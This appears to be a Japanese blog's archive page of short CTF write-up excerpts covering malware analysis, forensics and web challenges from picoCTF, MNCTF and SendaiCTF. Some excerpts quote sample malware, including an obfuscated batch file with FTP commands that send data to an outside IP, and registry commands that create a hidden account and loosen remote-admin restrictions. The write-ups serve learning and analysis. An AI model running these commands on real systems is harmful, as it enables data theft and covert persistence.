@toRi

できたてほやほやのエンジニアです。インフラ、セキュリティ系です。ふんわり命がけ(´・ω・)

2019-11-01から1ヶ月間の記事一覧

picoCTF2018 you can't see me - Points: 200

ls -lコマンドでディレクトリ内を見てみると、. のファイル?らしきものが。 このような名前のファイルをcatで見ようとしてもエラーになるので、後ろに*をつけて見てみます。 フラグがありました。

MNCTF 2018 新人奮闘III(マルウェア解析)

マルウェアをStringsコマンドで実行しました。 # strings AD_OptimizationTool.exe !This program cannot be run in DOS mode. .text .data @.import hO @ hK @ h| @ AD Optimizer Optimization successfuly finished.\nThe speed increased 176%. /c net us…

MNCTF 2018 新人奮闘I(マルウェア解析)

問題のzipファイルを展開すると実行ファイルが出てきました。 Linux環境でsha256sum <ファイル名>でSHA256ハッシュ値(フラグ)を求めました。 # sha256sum AD_OptimizationTool.exe f24f5629be2e0f821adb36fe4d47407937f5a318bf96ae3655b628f833040f29 AD_O…

SendaiCTF2018 Net.3 Tomcat脆弱性 100

前問のパケットをみると、ファイルをアップロードしているので、その脆弱性について調べたら以下のような記事がでてきました。

picoCTF Secret Agent - Points: 200

アクセスしてみます。 Flagを押しても、あなたgoogleじゃないでしょ、みたいに拒否されます。 chromeで開いてるのに?? 調べてみたら、chromeでF12を押すとディベロッパーツールが開けて、そこから色々調節するみたいです。 F12→Network→NetworkConditionで…

MNCTF 2018 新人奮闘II(マルウェア解析)

ハッシュ値、ファイルサイズは以下のように求めました。 # md5sum AD_OptimizationTool.exe 541427a9dbe43b10c05b856cdcdc5ba6 AD_OptimizationTool.exe # sha1sum AD_OptimizationTool.exe e0fa838e0f191f97c5dac7a831af60d750432017 AD_OptimizationTool.e…

SendaiCTF 2018 For.1 ダウンロード元URLの特定 100

とりあえず、バイナリデータとしてダウンロードしたファイルを開きます。 最後のほうにexeファイルのURLがありました。

SendaiCTF2018 Net.2 攻撃元の特定 100(ネットワーク)

とりあえず、ネットでTomcatサーバの脆弱性について検索してみました。 Apache Tomcatの「Common Gateway Interface(CGI)」サーブレットに関して、遠隔からのコード実行(Remote Code Execution、RCE)の脆弱性が確認されました。この深刻度の高い脆弱性が…

MNCTF 2018 新人奮闘IV(フォレンジック )

# curl http://mnctf.info/mnctf2018/task/vpn20180712.log | grep vpnadmin 2018/07/13 15:01,vpnadmin,27.117.128.1 前の問題でuser名はvpnadminと分かりました。このコマンドで一発で出てきました。2018/07/13 15:01がフラグです。

MNCTF 2019 標的攻撃Ⅲ(マルウェア)60pts

標的攻撃ⅡのフラグのPPORT_388945a1をネットで検索すると、 OceanLotusというグループ(フラグ)であることが分かる。

MNCTF 2019 情報漏洩Ⅱ(その他) 100pts

batファイルの続きにFTPサーバーへのアクセスが見えるので、アクセスしました。 if A%USERDOMAINJkjNCIMZMscrSkoGFOOM% echo open 157.7.53.197> temp.txt echo P455w0rd>> temp.txt REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed d…

MNCTF 2018 新人奮闘V(その他)

前の問題で分かっているIPをググってみます。 2018/07/13 15:01,vpnadmin,27.117.128.1 韓国でした。

MNCTF 2019 情報漏洩I(マルウェア) 100pts

zipファイルを与えられたパスワードを使って解凍しました。 batファイルがあるので、VScodeで開いてみました。 %P%@%r%e%I%c%g%h%E%o%R% %I%o%y%f%J%f%L% %d%R%f%E%R%M%z% %y%T%z%O%g%O%M%L%l% %P%N%F%A%u%M%E%E%I%:%E% %Y% %E% %F%X%b%L%b%S%S%_%W%S%l%t%K%…

MNCTF 2019 標的攻撃Ⅳ(マルウェア)60pts

/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388…

MNCTF 2019 建屋制御Ⅰ(ネットワーク) 60pts

設定シートを見てみると、1階のどこかかな?とあたりがつきます。PCAPファイルをWireSharkで開きます。 locationで検索してみます。かなり絞れたのでひとつずつ見ていきます。 1F_factory(フラグ)という文字列がASCIIにありました。

MNCTF 2019 標的攻撃I (フォレンジック)80pts

ディスクイメージファイル(diskimage.vmdk )を渡されるので、FTK Imagerで削除されたファイル等がないか見てみます。 rootディレクトリを見ると、a.exe というファイルが削除された痕跡があります。右クリックしてハッシュ値を取り出します。 ハッシュ値(…

MNCTF 2019 暗証保護(Web) 100pts

サイトにアクセスすると、 パスワードファイルの password.php と、URLを入力するとHTTPのリクエストヘッダとレスポンスヘッダを表示してくれる webchecker.php というサイトのURLがあります。 パスワードファイルはみれませんでした。webcheckerのホスト名…

MNCTF 2019 標的攻撃Ⅱ(マルウェア)60pts

標的攻撃Ⅰで見つけた怪しい実行ファイルを、FTK Imagerを使ってエクスポートします。 マルウェアを実行するのは怖いですが、、、 Linux環境でstringsコマンドで実行しました。 # strings a.EXE !This program cannot be run in DOS mode. .text .data @.impo…

MNCTF 2019 悪意部品(暗号) 100pts

まずはファイルの拡張子はpngとなっているものの、画像ファイルとして開けないので、攻撃グループBlackTechが使うマルウエアPLEADダウンローダ(ヒントのサイト)のようにバイナリエディタで開くことにしました。 いつも使っているVisual Studio Codeの拡張…